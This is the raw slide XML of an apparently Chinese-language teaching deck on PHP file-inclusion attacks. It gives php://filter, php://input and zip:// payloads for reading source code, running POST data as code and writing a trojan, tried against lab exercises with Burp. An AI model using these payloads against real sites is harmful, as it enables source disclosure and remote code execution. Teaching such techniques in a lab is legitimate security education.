          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>include'header.php';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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require'config.php';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1875790" y="4749165"/>
            <a:ext cx="3483610" cy="18878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7021830" y="4876165"/>
            <a:ext cx="1598930" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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2095500" y="4876165"/>
            <a:ext cx="1598930" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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 name="直接箭头连接符 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="1"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3694430" y="5208270"/>
            <a:ext cx="3327400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ilter</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760095" y="2919095"/>
            <a:ext cx="10071100" cy="1604645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>convert.base64-encode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>convert.base64-decode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将数据进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码、解码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760730" y="1315720"/>
            <a:ext cx="10069830" cy="1291590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>filter转换过滤器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主要含有三类，分别是base64的编码转换、quoted-printable的编码转换以及iconv字符编码的转换。该类过滤器以convert（转换）开头。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="814070" y="4919345"/>
            <a:ext cx="10955020" cy="1442720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Filter-LFI-1</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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286510" y="1505585"/>
            <a:ext cx="9131300" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包含函数并不直接看到代码而只是执行，但是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方式可以将代码显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>出来</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>LFI-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例子，使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，只能执行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>看不到源码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272540" y="2709545"/>
            <a:ext cx="9646920" cy="2446020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314450" y="5401310"/>
            <a:ext cx="8816340" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>php://filter/convert.base64-encode/resource=index.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这样就以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码方式输出了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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Filter-LFI-1</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9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1138555"/>
            <a:ext cx="9492615" cy="2674620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246505" y="3792855"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之后进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>转码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="974090" y="4566285"/>
            <a:ext cx="10393045" cy="1887220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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input-EX1</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008380" y="1547495"/>
            <a:ext cx="5695950" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>EX-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，发现里面有个链接，点击后能跳转到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>百度</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026795" y="1189355"/>
            <a:ext cx="6208395" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会将post请求的数据当作php代码执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026795" y="2025015"/>
            <a:ext cx="5727065" cy="1052195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026795" y="3544570"/>
            <a:ext cx="5676900" cy="2979420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920115" y="3162935"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>click go baidu,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以抓到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453630" y="3544570"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>抓到的内容都是将要进行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453630" y="4053205"/>
            <a:ext cx="2643505" cy="1544320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7316470" y="5737860"/>
            <a:ext cx="4380865" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>试一下，结果显示我是黑客，也就是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码中已经对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防范</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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input-EX-1</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10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177290" y="1323340"/>
            <a:ext cx="7175500" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将请求都变为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177290" y="1776730"/>
            <a:ext cx="8663305" cy="3557905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177290" y="5419725"/>
            <a:ext cx="9405620" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就可以看见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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input-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马</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428750" y="1289685"/>
            <a:ext cx="8931910" cy="4117975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428750" y="5707380"/>
            <a:ext cx="4754880" cy="1089660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6785610" y="6160135"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这里就写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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ZIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪协议</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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266065" y="2365375"/>
            <a:ext cx="11744325" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>zip:// 可以访问压缩包里面的文件。当它与包含函数结合时，zip://流会被当作php文件执行。从而实现任意代码执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注意：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>①zip://中只能传入绝对路径。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>②要用#分隔压缩包和压缩包里的内容，并且#要用url编码%23（即下述POC中#要用%23替换）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>③只需要是zip的压缩包即可，后缀名可以任意更改</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710565" y="5053330"/>
            <a:ext cx="8938260" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>zip://C:/Users/32995/Desktop/FileInclude/press.zip%23press.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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381125"/>
            <a:ext cx="8105140" cy="4091305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 9"/>
          <p:cNvSpPr/>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p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7634729" y="2602886"/>
            <a:ext cx="4288354"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879748" y="458427"/>
            <a:ext cx="1877060"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p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8147690" y="4618806"/>
            <a:ext cx="3262432"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pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="图片 34" descr="模糊的照片上写着字&#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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5295995" y="133020"/>
            <a:ext cx="2749035" cy="934920"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>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 name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>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0" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>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8"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>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9"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>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10"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>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11"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>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2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>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3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>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4"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>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5"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>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6"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>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7"/>
            <p:cNvSpPr/>
